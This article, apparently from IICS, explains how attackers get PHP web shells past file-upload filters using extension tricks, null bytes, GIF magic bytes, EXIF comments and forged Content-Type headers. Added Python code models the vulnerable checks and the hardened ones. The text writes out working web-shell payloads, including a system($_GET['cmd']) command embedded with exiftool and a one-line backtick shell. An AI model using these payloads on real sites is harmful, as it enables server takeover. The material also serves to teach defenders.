How to Bypass file upload restrictions in web applications to install a backdoor

Uploading files is very common on a large share of websites around the world. Platforms like LinkedIn or Facebook allow users to upload images, MP3, MP4, PDF files and many other formats. However, cybersecurity specialists point out that file upload also poses severe security risks that must be addressed before hackers abuse them.

This time, specialists at the International Institute of Cyber Security (IICS) will show ways threat actors can abuse the file upload feature to compromise websites and even servers.

It is important to know the basics about web shells and file upload vulnerabilities. A web shell is a small script in a server-side language (PHP, JSP, ASP and so on) that the attacker uploads to the server and then calls through the browser. Attackers use web shells for various operations, such as executing shell commands, deleting files, creating files, uploading further files, and so on. Uploading the shell is usually the easy part; the difficulty is getting it past the filters and constraints the application places on uploads, and the rest of this article covers how those are bypassed.

Bypass blacklists

For security reasons, certain file extensions are explicitly prohibited (blacklisted) on the server. This may seem like the best way to keep websites and servers free of hacking, but a blacklist can only reject what the developer thought of, and there are several conditions under which it can be bypassed.

File extensions

Developers blacklist certain file extensions and prevent users from uploading files that are considered dangerous to the server. However, a blacklist is only as complete as the developer's list: threat actors get around it by using an alternative extension that the web server still maps to the same interpreter, which is enough to upload and run a payload or web shell.

Below is a list of server-side languages with the alternative extensions that are commonly mapped to their interpreters (the exact set depends on the web server's handler configuration):

  • PHP: .pht, .phtml, .php, .php3, .php4, .php5, .php6, .inc
  • JSP: .jsp, .jspx, .jsw, .jsv, and .jspf
  • Perl: .pl, .pm, .cgi, .lib
  • ASP: .asp, .aspx
  • ColdFusion: .cfm, .cfml, .cfc, .dbm

In some cases the alternative extensions are blacklisted as well. If the blacklist compares extensions case-sensitively while the web server maps handlers case-insensitively (Apache's mod_mime does), varying the case of the extension is enough:

.pHp, .Php, .phP

Bypassing whitelists

A whitelist lists only the extensions that the server accepts as uploads. For example, a website that allows uploading a profile picture may accept only JPG, JPEG or PNG formats, cybersecurity experts mentioned.

On the other hand, a whitelist that only looks at the last extension can be fooled with double extensions. When PHP is registered in Apache with AddHandler, mod_mime consults every extension in the file name, not just the last one, so a shell named with a PNG extension at the end is still handed to the PHP interpreter. The null-byte variants below rely on older PHP versions (before 5.3.4) and other C-based code paths that truncate the file name at the first NUL, so the whitelist sees .png or .jpg while the file is stored as shell.php:

shell.php.png
shell.php%00.png
shell.php\x00.jpg
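To make the extension tricks above concrete (the alternative-extension list, the case variation, the double extension and the null byte), here is an added example in Python that is not part of the original article. It models the naive blacklist and whitelist checks a developer might write, models how Apache's mod_mime chooses a handler when PHP is registered with AddHandler, and shows the hardened check that defeats all four tricks. The handler-extension set, the NUL-truncation model and the `evaluate` / `hardened_storage_name` helpers are assumptions of the example, not real server configuration.

```python
import os
import secrets
from typing import Optional

# Constructed example of a developer's blacklist: only the obvious extension,
# compared case-sensitively against the last suffix of the file name.
NAIVE_BLACKLIST = {".php"}

# Extensions that an Apache + mod_php installation typically maps to the PHP
# handler. Assumption for this example; the real set is whatever the server's
# AddHandler / FilesMatch directives say.
PHP_HANDLER_EXTENSIONS = {".php", ".php3", ".php4", ".php5", ".php6", ".pht", ".phtml"}

ALLOWED_IMAGE_EXTENSIONS = {".jpg", ".jpeg", ".png", ".gif"}


def naive_blacklist_allows(filename: str) -> bool:
    """Vulnerable blacklist: rejects only an exact, case-sensitive '.php' suffix.
    'shell.pHp', 'shell.phtml' and 'shell.php.png' all pass."""
    ext = os.path.splitext(filename)[1]
    return ext not in NAIVE_BLACKLIST


def naive_whitelist_allows(filename: str) -> bool:
    """Vulnerable whitelist: looks only at the final suffix, so 'shell.php.png'
    and 'shell.php\\x00.png' pass."""
    return filename.lower().endswith(tuple(ALLOWED_IMAGE_EXTENSIONS))


def apache_mod_mime_is_php(stored_name: str) -> bool:
    """Model of mod_mime handler selection when PHP is registered with
    AddHandler: every dotted segment after the base name is consulted,
    case-insensitively, so 'shell.php.png' and 'shell.pHp' both reach the PHP
    interpreter. A FilesMatch '\\.php$' rule (the modern default) would not."""
    segments = stored_name.split(".")[1:]
    return any("." + seg.lower() in PHP_HANDLER_EXTENSIONS for seg in segments)


def c_string_truncate(filename: str) -> str:
    """Name as seen by a C API: everything after the first NUL byte is dropped.
    PHP before 5.3.4 passed upload names to such APIs without rejecting NULs."""
    return filename.split("\x00", 1)[0]


def evaluate(filename: str) -> dict:
    """Run one submitted file name through the naive checks and report what
    ends up on disk and whether the web server would execute it as PHP."""
    stored = c_string_truncate(filename)
    return {
        "blacklist_passes": naive_blacklist_allows(filename),
        "whitelist_passes": naive_whitelist_allows(filename),
        "stored_as": stored,
        "executed_as_php": apache_mod_mime_is_php(stored),
    }


def hardened_storage_name(filename: str) -> Optional[str]:
    """Hardened counterpart: refuse NUL bytes, keep only the last extension,
    compare it lower-cased against the whitelist, and throw away the
    user-supplied base name so no '.php' segment survives into the stored name."""
    if "\x00" in filename:
        return None
    ext = os.path.splitext(filename)[1].lower()
    if ext not in ALLOWED_IMAGE_EXTENSIONS:
        return None
    return secrets.token_hex(16) + ext


if __name__ == "__main__":
    for name in ["avatar.png", "shell.php", "shell.pHp", "shell.phtml",
                 "shell.php.png", "shell.php\x00.png"]:
        print(repr(name), evaluate(name), "->", hardened_storage_name(name))
```

The key design point of the hardened version is the last line: the stored name is generated by the server, so even a file submitted as shell.php.png lands on disk as a random hex name plus .png, which no handler rule maps to PHP.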

Another way to get past a whitelist is to manipulate the file's content so that it looks like an image. If the site checks the file's magic bytes (for example with PHP's getimagesize()), a file that starts with the GIF signature GIF89a is accepted as an image even if the rest of it is PHP code, so hackers prepend GIF89a to the shell.

EXIF data

This method bypasses content checks by hiding the PHP code in the image's metadata: the attacker writes a comment containing PHP code into the EXIF data, so the file remains a valid image while still carrying the shell. Combined with one of the extension tricks above, the server passes the file to the PHP interpreter, which executes the code it finds in the comment.

This is easy to do with GIMP or ExifTool, cybersecurity experts mentioned:

exiftool -Comment='<?php echo "<pre>"; system($_GET["cmd"]); ?>' file.png
mv file.png file.php.png
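The following is an added Python example, not code from the article, covering both the GIF89a magic-bytes trick from the whitelist section and the metadata-comment trick above. It builds a valid GIF whose Comment Extension block carries PHP code (the same idea as the exiftool -Comment command, done for GIF comment blocks instead of JPEG/PNG metadata so it runs without ExifTool), shows that a signature-only check accepts it, and includes a block walker a defender can use to pull comments out of a GIF before storing it. The 43-byte carrier image, the helper names and the cheap `contains_php` check are constructed for the example.

```python
from typing import List

# Constructed carrier: the well-known 43-byte 1x1 transparent GIF89a, split at
# the point where a Comment Extension may be inserted.
GIF_HEADER = (
    b"GIF89a"
    + bytes.fromhex("01000100800000")   # logical screen descriptor: 1x1, global color table flag set
    + bytes.fromhex("000000ffffff")     # 2-entry global color table (black, white)
)
GIF_IMAGE_AND_TRAILER = (
    bytes.fromhex("21f9040100000000")        # graphic control extension
    + bytes.fromhex("2c000000000100010000")  # image descriptor: 1x1 at (0,0), no local table
    + bytes.fromhex("0202440100")            # LZW min code size 2, one 2-byte sub-block, terminator
    + b"\x3b"                                # trailer
)
MINIMAL_GIF = GIF_HEADER + GIF_IMAGE_AND_TRAILER


def gif_comment_extension(text: bytes) -> bytes:
    """GIF89a Comment Extension (introducer 0x21, label 0xFE): the text is
    carried in sub-blocks of at most 255 bytes, followed by a 0x00 terminator."""
    out = bytearray(b"\x21\xfe")
    for i in range(0, len(text), 255):
        chunk = text[i:i + 255]
        out += bytes([len(chunk)]) + chunk
    out.append(0)
    return bytes(out)


def make_polyglot(payload: bytes) -> bytes:
    """Attacker side: a valid GIF whose comment is PHP code. It starts with
    GIF89a, so a signature check treats it as an image."""
    return GIF_HEADER + gif_comment_extension(payload) + GIF_IMAGE_AND_TRAILER


def passes_magic_check(data: bytes) -> bool:
    """The kind of content check a server might do: only the signature is examined."""
    return data[:6] in (b"GIF87a", b"GIF89a")


def contains_php(data: bytes) -> bool:
    """Cheap defender indicator: PHP open tags anywhere in the file body."""
    return b"<?php" in data or b"<?=" in data


def _read_subblocks(data: bytes, pos: int):
    """Read a chain of length-prefixed sub-blocks up to the 0x00 terminator."""
    buf = bytearray()
    while True:
        n = data[pos]
        pos += 1
        if n == 0:
            return bytes(buf), pos
        buf += data[pos:pos + n]
        pos += n


def gif_comments(data: bytes) -> List[bytes]:
    """Defender side: walk the GIF block structure and return every comment
    payload, so metadata can be inspected (or stripped) before storage."""
    if not passes_magic_check(data):
        raise ValueError("not a GIF")
    packed = data[10]
    pos = 13
    if packed & 0x80:                       # global color table present
        pos += 3 * (2 << (packed & 0x07))   # 2^(N+1) entries of 3 bytes
    comments = []
    while pos < len(data):
        block = data[pos]
        pos += 1
        if block == 0x3B:                   # trailer
            break
        if block == 0x21:                   # extension block
            label = data[pos]
            body, pos = _read_subblocks(data, pos + 1)
            if label == 0xFE:
                comments.append(body)
        elif block == 0x2C:                 # image descriptor
            local_packed = data[pos + 8]
            pos += 9
            if local_packed & 0x80:         # local color table present
                pos += 3 * (2 << (local_packed & 0x07))
            _, pos = _read_subblocks(data, pos + 1)   # skip LZW min code size, then image data
        else:
            raise ValueError(f"unexpected block 0x{block:02x} at offset {pos - 1}")
    return comments


if __name__ == "__main__":
    shell = b'<?php echo "<pre>"; system($_GET["cmd"]); ?>'
    img = make_polyglot(shell)
    print("magic check:", passes_magic_check(img), "| comments:", gif_comments(img))
```

As with the ExifTool version, the image stays valid and the PHP is only text inside a comment block; it runs only if the web server hands the file to the PHP interpreter, which is what the extension tricks in the previous sections arrange.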

MIME types

MIME types (Multipurpose Internet Mail Extensions) are the standard way of labeling the kind of content being sent over the network. A MIME type such as text/plain, image/jpeg or audio/mpeg tells the receiver what kind of data a file contains.

Checking the MIME type declared in the upload is another method used to validate file uploads, either by blacklisting or by whitelisting types. The catch is that this type is declared by the client, in the Content-Type header of the multipart part that carries the file, so hackers intercept the POST request with an intercepting proxy and change it before it reaches the server. The usual PHP MIME type is:

Content-Type: application/x-php

Hackers can replace this value with:

Content-Type: image/jpeg
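As an added example that is not from the article, the following Python code builds the multipart POST exactly as an intercepting proxy would send it with a rewritten Content-Type, then contrasts a server check that trusts that header with one that sniffs the file's magic bytes and ignores the declared type. The multipart builder and parser, the magic-byte table, the sample payloads and the function names are all constructed for the example.

```python
import os
import re
from typing import Optional, Tuple

# Signatures the hardened server trusts instead of the declared Content-Type.
MAGIC = {
    b"\xff\xd8\xff": "image/jpeg",
    b"\x89PNG\r\n\x1a\n": "image/png",
    b"GIF87a": "image/gif",
    b"GIF89a": "image/gif",
}
EXT_FOR_MIME = {"image/jpeg": (".jpg", ".jpeg"), "image/png": (".png",), "image/gif": (".gif",)}


def build_multipart(filename: str, declared_type: str, content: bytes,
                    boundary: str = "----ExampleBoundary") -> Tuple[str, bytes]:
    """Client side. Returns the request Content-Type header and the body.
    'declared_type' is the per-part Content-Type: the browser fills it in from
    the extension, and an intercepting proxy can rewrite it freely."""
    body = (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="file"; filename="{filename}"\r\n'
        f"Content-Type: {declared_type}\r\n"
        f"\r\n"
    ).encode() + content + f"\r\n--{boundary}--\r\n".encode()
    return f"multipart/form-data; boundary={boundary}", body


def parse_upload(content_type_header: str, body: bytes) -> Tuple[str, str, bytes]:
    """Minimal multipart/form-data parser: returns (filename, declared type,
    bytes) of the first file part. Written for the example; a framework would do this."""
    boundary = content_type_header.split("boundary=", 1)[1].encode()
    for raw in body.split(b"--" + boundary)[1:-1]:      # drop preamble and closing '--'
        if raw.startswith(b"\r\n"):
            raw = raw[2:]
        head, _, content = raw.partition(b"\r\n\r\n")
        if content.endswith(b"\r\n"):
            content = content[:-2]
        headers = {}
        for line in head.split(b"\r\n"):
            name, _, value = line.decode("latin-1").partition(":")
            headers[name.strip().lower()] = value.strip()
        match = re.search(r'filename="([^"]*)"', headers.get("content-disposition", ""))
        if match:
            return match.group(1), headers.get("content-type", "application/octet-stream"), content
    raise ValueError("no file part in request")


def naive_server_accepts(content_type_header: str, body: bytes) -> bool:
    """Vulnerable: decides on the client-declared MIME type alone."""
    _, declared, _ = parse_upload(content_type_header, body)
    return declared.startswith("image/")


def sniff_type(content: bytes) -> Optional[str]:
    """Type from the leading bytes, or None if no known image signature."""
    for magic, mime in MAGIC.items():
        if content.startswith(magic):
            return mime
    return None


def hardened_server_accepts(content_type_header: str, body: bytes) -> bool:
    """Ignores the declared type: the sniffed type and the (last, lower-cased)
    extension must agree, and PHP open tags anywhere in the body are refused.
    Re-encoding the image server-side is the robust form of that last check."""
    filename, _, content = parse_upload(content_type_header, body)
    ext = os.path.splitext(filename)[1].lower()
    sniffed = sniff_type(content)
    if sniffed is None or ext not in EXT_FOR_MIME[sniffed]:
        return False
    return b"<?" not in content


if __name__ == "__main__":
    php = b'<?php system($_GET["cmd"]); ?>'          # constructed shell payload
    header, body = build_multipart("shell.php", "image/jpeg", php)
    print("naive:", naive_server_accepts(header, body), "| hardened:", hardened_server_accepts(header, body))
```

The naive check only ever sees what the client wrote into the part header, which is why the Content-Type swap described above works; the hardened check treats that header as untrusted input and derives the type from the bytes it actually received.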

Other alternative methods

In some situations the server limits the length of the uploaded content, which can also get in the way of a bulky web shell, cybersecurity experts point out. In that case the PHP shell can be cut down to a single short-tag line, where the backticks execute the value of the x parameter as a shell command:

<?=`$_GET[x]`?>

Please note that this article was prepared for informational purposes only, so IICS is not responsible for any misuse of the information contained herein. To learn more about information security risks, malware variants, vulnerabilities and information technologies, feel free to access the International Institute of Cyber Security (IICS) websites.